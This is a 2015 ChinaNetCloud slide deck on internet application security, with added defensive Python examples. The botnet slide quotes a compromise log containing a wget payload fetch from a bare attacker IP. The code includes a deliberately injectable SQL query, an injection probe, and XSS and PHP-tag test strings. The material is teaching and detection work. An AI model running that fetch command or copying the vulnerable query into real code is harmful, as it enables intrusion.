Internet System Security Overview
Internet Application Security: Securing Your System
By Steve Mushero, April 2015
Build & Manage Servers | Optimize & Manage Servers | Manage Cloud Servers
Copyright © 2015 ChinaNetCloud
Running the World's Internet Servers www.ChinaNetCloud.com

Big Exciting Internet
[Chart: Internet Users (in millions), 1994–2014, y-axis 0 to 3,500; growth in percentages annotated 80%, 76%, 73%, 56%, 49%, 47%. Source: Internet Live Stats. Note: * estimate for July 1, 2014.]

Use every day for everything

For Every Part of Life

But not everything is happy

Today's Three Security Problems
• DDoS
• Steal Data
• Botnets

Security Problem #1 – DDoS
• For Fun
• Get Money
• Competitors

Security Problem #2 – Stealing Data
• Steal Money
• Steal/Sell Data
• Steal Code

Security Problem #3 – BotNets
• Break In
• Install Root Kit
• Call home for control
• Do evil

Apr 23 14:34:03 [/root]# wget http://61.147.103.146:999/IP
root 1451 0.1 0.0 75196 1260 ? Ssl 00:54 1:36 /root/sshd
sshd 1451 root 4u IPv4 318269 0t0 TCP :22839->36.251.187.212:13800 (ESTABLISHED)

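The three lines on the slide are the classic indicator set for a host that has joined a botnet: a download from a bare IP on an odd port, a process calling itself sshd but started from /root, and an established outbound session owned by that process. The Python below is an added illustration, not part of the original deck; it parses shell-history, ps and lsof output in those formats and flags exactly those indicators. The expected daemon paths, the staging-directory list and the benign sshd/yum lines are assumptions constructed for the example; the three indicator lines are the slide's own.

```python
import re
from os.path import basename

# Sample input: the wget, ps and lsof indicator lines are the ones shown on the
# slide; the benign sshd / yum lines are constructed here for contrast.
HISTORY = [
    "Apr 23 14:34:03 [/root]# wget http://61.147.103.146:999/IP",
    "Apr 23 14:40:11 [/root]# yum update -y",
]
PS_OUTPUT = [
    "root 820 0.0 0.0 65508 1100 ? Ss 00:50 0:00 /usr/sbin/sshd -D",
    "root 1451 0.1 0.0 75196 1260 ? Ssl 00:54 1:36 /root/sshd",
]
LSOF_OUTPUT = [
    "sshd 820 root 3u IPv4 12345 0t0 TCP *:22 (LISTEN)",
    "sshd 1451 root 4u IPv4 318269 0t0 TCP :22839->36.251.187.212:13800 (ESTABLISHED)",
]

# Where the genuine daemons live on this host (an assumption; adjust per distro).
EXPECTED_PATHS = {"sshd": {"/usr/sbin/sshd"}, "crond": {"/usr/sbin/crond"}}
# Writable locations from which no legitimate system daemon is ever launched.
STAGING_DIRS = ("/root/", "/tmp/", "/var/tmp/", "/dev/shm/", "/home/")

# wget/curl fetching from a bare IPv4 address with an explicit port.
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl)\b.*?https?://(\d{1,3}(?:\.\d{1,3}){3}):(\d+)/")
# lsof -i columns: COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME (STATE)
LSOF_RE = re.compile(
    r"^(?P<cmd>\S+)\s+(?P<pid>\d+)\s+(?P<user>\S+)\s+\S+\s+\S+\s+\S+\s+\S+\s+TCP\s+"
    r"(?P<local>\S+)->(?P<rhost>[\d.]+):(?P<rport>\d+)\s+\((?P<state>\w+)\)$"
)


def suspicious_processes(ps_lines):
    """Return {pid: reason} for daemons started from an unexpected location."""
    found = {}
    for line in ps_lines:
        parts = line.split(None, 10)  # ps aux has 10 fixed columns, then COMMAND
        if len(parts) < 11:
            continue
        pid, command = int(parts[1]), parts[10]
        exe = command.split()[0]
        name = basename(exe)
        if exe.startswith(STAGING_DIRS):
            found[pid] = f"{name} started from writable staging dir {exe}"
        elif name in EXPECTED_PATHS and exe not in EXPECTED_PATHS[name]:
            found[pid] = f"{name} impersonated: running from {exe}"
    return found


def beaconing_connections(lsof_lines, suspicious):
    """Established outbound TCP sessions owned by a suspicious pid: (pid, host, port)."""
    hits = []
    for line in lsof_lines:
        m = LSOF_RE.match(line)
        if not m or m["state"] != "ESTABLISHED":
            continue
        pid = int(m["pid"])
        if pid in suspicious:
            hits.append((pid, m["rhost"], int(m["rport"])))
    return hits


def bare_ip_downloads(history_lines):
    """Fetches from a bare IP on an explicit port, the usual dropper-staging pattern."""
    return [(m[1], int(m[2])) for m in map(DOWNLOAD_RE.search, history_lines) if m]


def triage(history, ps_lines, lsof_lines):
    """Run all three checks and return the findings as one dict."""
    procs = suspicious_processes(ps_lines)
    return {
        "downloads": bare_ip_downloads(history),
        "processes": procs,
        "beacons": beaconing_connections(lsof_lines, procs),
    }


if __name__ == "__main__":
    for kind, findings in triage(HISTORY, PS_OUTPUT, LSOF_OUTPUT).items():
        print(f"{kind}: {findings}")
```

On a real host, feed it `ps aux`, `lsof -i -nP` and the root shell history; a process impersonating a system daemon from a writable directory is a strong enough signal on its own to isolate the machine, and the established session gives you the command-and-control address to block at the firewall and search for across the fleet.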
Where is Operations & Security? Duang!

Our Job is to Serve & Protect

Security is Secondary, Not Important
Features · Performance · Convenience
Security

But becoming more important
P2P Lending (finance) · E-Commerce · SaaS
Features · Performance · Convenience
Security

How to be Secure?

What is the most Secure Application?

Lots of pieces
• Internet
• Firewalls
• Web/App Servers
• Database
• OS
• Servers / Cloud

4 Security Zones
• Internet
• In Front of Your Application
• Inside Your App
• Under Your App

Zone: Internet

DDoS Attacks

DDoS Type 1 – Overload Bandwidth

DDoS Type 2 – Overload Servers

DDoS – Solutions
• Cloud Filtering – Anquanbao (安全宝)
• CDN Support
• IDC Hardware
• Front of Application Blocking
  • Complex & Difficult
• In Application Mitigation
  • Caching

Zone: In Front of Your Application

Firewalls – Traditional
• Required – Basic protection
• Basic filtering
• NAT inbound: ssh, monitoring
• NAT outbound: Backups, DNS, ntp, updates

WAF – Web App Firewall
• Increasingly Required
• More Advanced
• More Complex
• Can break your Application
• Hard to Manage
• Hard to Monitor
• Different Types
  • Patterns vs. Heuristics
(Anquanbao)

WAF – Web App Firewall
• Two key protections
  • Protect Application Code
    • OWASP basics: SQL, XSS
  • DDoS Filtering & Limiting
    • IP, agent, url, session

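The "filtering & limiting" half of a WAF is, at its core, a set of counters keyed on the dimensions the slide lists: source IP, user agent, URL, session. The Python below is an added example, not code from the deck or from any of the WAF products it names; it replays access-log lines in the standard combined format through a sliding-window limiter with one rule per key. The log lines, the per-rule limits and the window length are all constructed assumptions for the example, chosen so that one scripted client trips the per-IP-per-URL rule while a normal browser does not.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache/nginx "combined" log format (assumed input format for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'\d+ \d+ "[^"]*" "(?P<agent>[^"]*)"$'
)


def _line(ip, second, method, url, agent):
    """Build one constructed combined-format log line (sample data, not real traffic)."""
    return (f'{ip} - - [23/Apr/2015:14:34:{second:02d} +0800] '
            f'"{method} {url} HTTP/1.1" 200 512 "-" "{agent}"')


# Constructed sample: one client posts to /login eight times in eight seconds,
# another browses three pages at a human pace.
SAMPLE_LOG = (
    [_line("10.0.0.7", s, "POST", "/login", "python-requests/2.5") for s in range(8)]
    + [_line("10.0.0.8", 3 * i, "GET", p, "Mozilla/5.0")
       for i, p in enumerate(["/", "/about", "/cart"])]
)

# Rule name -> (key function over (ip, url, agent), max requests, window seconds).
# Limits are illustrative assumptions; tune them to your own traffic profile.
RULES = {
    "ip":     (lambda ip, url, agent: ip,        20, 10.0),
    "ip_url": (lambda ip, url, agent: (ip, url),  5, 10.0),
    "agent":  (lambda ip, url, agent: agent,     30, 10.0),
}


class SlidingWindowLimiter:
    """Per-key sliding window: a request trips a rule once more than `limit`
    requests for that key fall inside the last `window` seconds."""

    def __init__(self, rules):
        self.rules = rules
        self.hits = defaultdict(deque)   # (rule, key) -> timestamps in window

    def check(self, ts, ip, url, agent):
        tripped = []
        for name, (key_fn, limit, window) in self.rules.items():
            q = self.hits[(name, key_fn(ip, url, agent))]
            while q and ts - q[0] > window:
                q.popleft()              # drop hits that aged out of the window
            q.append(ts)
            if len(q) > limit:
                tripped.append(name)
        return tripped


def parse(line):
    """Return (unix_ts, ip, url, agent) or None for a line that does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").timestamp()
    return ts, m["ip"], m["url"], m["agent"]


def filter_log(lines, rules=RULES):
    """Replay log lines through the limiter; return (ip, url, tripped_rules) per request."""
    limiter = SlidingWindowLimiter(rules)
    decisions = []
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        ts, ip, url, agent = parsed
        decisions.append((ip, url, limiter.check(ts, ip, url, agent)))
    return decisions


if __name__ == "__main__":
    for ip, url, tripped in filter_log(SAMPLE_LOG):
        print("BLOCK" if tripped else "allow", ip, url, tripped)
```

The per-(IP, URL) rule is deliberately the tightest: it catches a single source hammering one endpoint (login, search, checkout) long before that source exhausts a whole-site per-IP budget. Session-keyed rules work the same way with the session cookie as the key, which is what lets a WAF limit an authenticated abuser sitting behind a shared NAT address without blocking everyone else behind it.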
WAF – Web App Firewall – Types
• Dedicated Hardware: Palo Alto Networks
• Software / Virtual: Anquanbao (安全宝), Aliyun Cloud Shield (云盾)
• Software Module: ModSecurity

Zone: Inside Your Application

Inside Your Application
Main App Security Problem?
Inside YOUR Application
Your Code
What to do?
Write secure code

Secure Code – Difficult & Frustrating

Code – OWASP Project Resources
• Info
• Guides
• Tools
http://owasp.org.cn

Code – OWASP Top 10 (ten biggest application risks)
Key Points
• A1 – Injection
• A2 – Auth & Session Mgmt
• A3 – XSS
• A7 – Function ACLs
• A8 – CSRF
• A9 – Insecure Components
http://owasp.org.cn

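Two of the key points above, A1 Injection and A3 XSS, come down to the same coding habit: never let untrusted input be concatenated into a language the backend will interpret (SQL, HTML). The Python below is an added example, not from the deck or from OWASP; it puts the vulnerable form of each lookup next to its hardened form against an in-memory SQLite table so the difference is observable. The table, its two constructed rows and the hypothetical column names are assumptions for the example.

```python
import html
import sqlite3


def make_db():
    """Constructed sample table; real code stores a salted password hash, never plaintext."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "hash_a"), ("bob", "hash_b")],
    )
    return conn


def find_user_vulnerable(conn, username, password_hash):
    """A1 – Injection: the query is built by string formatting, so the values
    submitted by the client become part of the SQL grammar itself."""
    query = (
        "SELECT username FROM users WHERE username = '"
        + username + "' AND password_hash = '" + password_hash + "'"
    )
    return [row[0] for row in conn.execute(query)]


def find_user_safe(conn, username, password_hash):
    """Hardened: parameterised query. The driver binds the values separately
    from the statement, so input can only ever be compared, never executed."""
    rows = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password_hash = ?",
        (username, password_hash),
    )
    return [row[0] for row in rows]


def render_comment_vulnerable(text):
    """A3 – XSS: user text is dropped straight into the HTML document."""
    return "<p>" + text + "</p>"


def render_comment_safe(text):
    """Hardened: escape for the HTML context (quote=True also covers attributes)."""
    return "<p>" + html.escape(text, quote=True) + "</p>"


if __name__ == "__main__":
    conn = make_db()
    probe = "' OR '1'='1"   # the textbook injection probe from the OWASP material
    print("vulnerable:", find_user_vulnerable(conn, probe, probe))
    print("safe:      ", find_user_safe(conn, probe, probe))
    print(render_comment_safe("<script>alert(1)</script>"))
```

The safe variants are not longer or slower than the vulnerable ones; the fix is a habit (placeholders for SQL, context-aware escaping for HTML) rather than extra machinery, which is why the deck's "write secure code" slide is short even though the topic is not. An application-level scan of the kind described on the next slide is what catches the places where the habit slipped.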
Inside Your Application – App Scanning
• Best practice
• Find new problems
  • As you update
  • Third parties
  • New exploits

Zone: Under Your Application

Under Your Application? What does that mean?

Under Your Application – Cloud & Servers
• Services
• Servers & OS
• Cloud
• Network

Cloud & Servers – Love & Respect Them
• Often forgotten
• Often use defaults
• Or random Google search
• Source of great danger

Services – Web Servers
• Best practices
• Lots of small issues
  • Running user
  • File permissions
  • Dangerous uploads – PHP inside JPEGs!
  • SSL – Heartbleed, etc.

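"PHP inside JPEGs" is the upload problem in one phrase: the web server trusts the file name, the file is stored where the PHP handler can reach it, and a script hidden in what looks like an image gets executed. The Python below is an added example (not the deck's code and not tied to any particular web server) of the checks an upload handler should run before a file touches disk: an extension allow-list, a magic-byte check that the content really is the declared image type, a tripwire for server-side script markers, and a random storage name so the original name never reaches the filesystem. The sample bytes and the marker list are constructed assumptions.

```python
import re
import secrets

# Allowed extension -> magic bytes the content must start with (assumed set).
ALLOWED = {
    "jpg":  b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png":  b"\x89PNG\r\n\x1a\n",
    "gif":  b"GIF8",
}

# Server-side script open tags that have no business inside an image file.
# Kept to multi-byte markers so random image data does not trip it.
SCRIPT_MARKERS = re.compile(rb"<\?php|<\?=|<script\b", re.IGNORECASE)


def validate_upload(filename, data):
    """Return (ok, reason) for an upload. Rejects anything that fails the
    extension allow-list, the magic-byte check or the script-marker tripwire."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED:
        return False, f"extension '{ext}' not allowed"
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match declared image type"
    if SCRIPT_MARKERS.search(data):
        return False, "embedded server-side script marker"
    return True, "ok"


def safe_storage_name(ext):
    """Random name with a single allow-listed extension. Double extensions such as
    shell.php.jpg never reach disk, so a multi-extension handler cannot run them."""
    if ext not in ALLOWED:
        raise ValueError("extension not in allow-list")
    return f"{secrets.token_hex(16)}.{ext}"


def accept_upload(filename, data):
    """Validate and, if clean, return the name to store under; None if rejected."""
    ok, _reason = validate_upload(filename, data)
    if not ok:
        return None
    return safe_storage_name(filename.rsplit(".", 1)[-1].lower())


if __name__ == "__main__":
    # Constructed samples: a minimal JPEG header, the same header with a PHP
    # tag appended, and a script file renamed to look like an image.
    jpeg = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
    for name, blob in [("photo.jpg", jpeg),
                       ("photo.jpg", jpeg + b"<?php echo 1; ?>"),
                       ("x.jpg", b"<?php echo 1; ?>"),
                       ("shell.php", b"<?php echo 1; ?>")]:
        print(name, validate_upload(name, blob))
```

Treat the marker scan as a tripwire, not a guarantee: a valid JPEG can carry arbitrary bytes in metadata, so the durable defences are the ones the slide's neighbours imply, namely storing uploads outside the document root (or on a path the PHP handler is configured never to execute), re-encoding images with an image library before serving them, and running the web server as a user that cannot write to its own code directories.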
Services – App Servers
• Best Practices
• Delete example apps
• Delete tools (Tomcat)
• Patch Software (Java!)

Services – Database Servers
• Use Best Practices
• Secure Configuration
• Limited User Permission
• Separate App & DBA User
• Separate User for each App
• Safe File Permissions
• Log SQL if possible

Under Your Application – Server & OS
• Hardened OS
• Iptables
• Run Users
• File permissions
• Logging
• Scanning (ClamAV)
• Track activity
• Automate
• System Updates

Under Your Application – Cloud
• Best Practices
• Control Access
• Can delete EVERYTHING
• Separate Backups
  • Out of Cloud
  • MFA Delete on AWS

Under Your Application – Network
• Generally okay, BUT
• VPC on Clouds – Separate
• Consider Out-of-Band Link (DDoS)
• Firewalls – Front & Middle
• Secure Configuration
• Separate test/dev network

Backups as Security
• Backups ARE part of Security
• If all else fails, use backups
• Keep them Secure
  • Avoid Theft & Tampering
  • Read-Only is Best

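"Avoid theft & tampering" has a concrete check behind it: a backup you cannot prove is unmodified is not a backup you can restore from with confidence. The Python below is an added example, not from the deck; it builds a keyed (HMAC-SHA256) manifest of a backup directory and later verifies the directory against it, reporting files that were altered, removed or added. A keyed MAC rather than a plain hash is used so that someone who can rewrite the backups cannot also rewrite the manifest to match, provided the key and the manifest live off the backup host. The directory layout, file names and key are constructed assumptions.

```python
import hashlib
import hmac
import tempfile
from pathlib import Path


def file_mac(path, key):
    """HMAC-SHA256 of a file's contents, streamed so large archives fit in memory."""
    h = hmac.new(key, digestmod=hashlib.sha256)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(backup_dir, key):
    """Manifest of every regular file: {name: {"size": bytes, "mac": hex}}.
    Store the result somewhere the backup host cannot write to."""
    return {
        p.name: {"size": p.stat().st_size, "mac": file_mac(p, key)}
        for p in sorted(Path(backup_dir).iterdir()) if p.is_file()
    }


def verify_manifest(backup_dir, manifest, key):
    """Compare the directory against a manifest; return a list of problems
    (empty when every listed file is present and unmodified)."""
    problems = []
    present = {p.name for p in Path(backup_dir).iterdir() if p.is_file()}
    for name, rec in manifest.items():
        if name not in present:
            problems.append(f"missing: {name}")
            continue
        actual = file_mac(Path(backup_dir) / name, key)
        if not hmac.compare_digest(actual, rec["mac"]):   # constant-time compare
            problems.append(f"tampered: {name}")
    for name in sorted(present - manifest.keys()):
        problems.append(f"unexpected: {name}")
    return problems


def demo():
    """Build a manifest for two constructed backup files, then tamper with the
    directory and verify again. Returns (problems_before, problems_after)."""
    key = b"constructed-manifest-key-keep-this-off-the-backup-host"
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "db-2015-04-23.sql.gz").write_bytes(b"constructed backup payload 1")
        (root / "www-2015-04-23.tar.gz").write_bytes(b"constructed backup payload 2")
        manifest = build_manifest(d, key)
        before = verify_manifest(d, manifest, key)

        # Simulate what a compromised host could do to its own backups.
        (root / "db-2015-04-23.sql.gz").write_bytes(b"constructed backup payload 1 MODIFIED")
        (root / "www-2015-04-23.tar.gz").unlink()
        (root / "extra.bin").write_bytes(b"planted file")
        after = verify_manifest(d, manifest, key)
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("clean run:", before or "no problems")
    print("after tampering:", after)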
Security Monitoring

Audit is also Important
Deep Check to Find Problems

Summary
• Security is Critically Important
• Increasingly Important
• Getting Harder
• But more Tools
• Details & Experts Help

How can ChinaNetCloud help?

We Manage All of this for you
• Deep Experience
• Experts at Every Level
• Part of Overall Operations

Thank you!

Thanks from ChinaNetCloud
Pioneers in OaaS – Operations as a Service
ChinaNetCloud [email protected]
www.ChinaNetCloud.com
Beijing Office: Lee World Business Building #305, 57 Happiness Village Road, Chaoyang District, Beijing, 100027 China
Silicon Valley Office: California Avenue, Palo Alto, 94123 USA
Shanghai Headquarters: X2 Space 1-601, 1238 Xietu Lu, Shanghai, 200032 China
T: +86-21-6422-1946 F: +86-21-6422-4911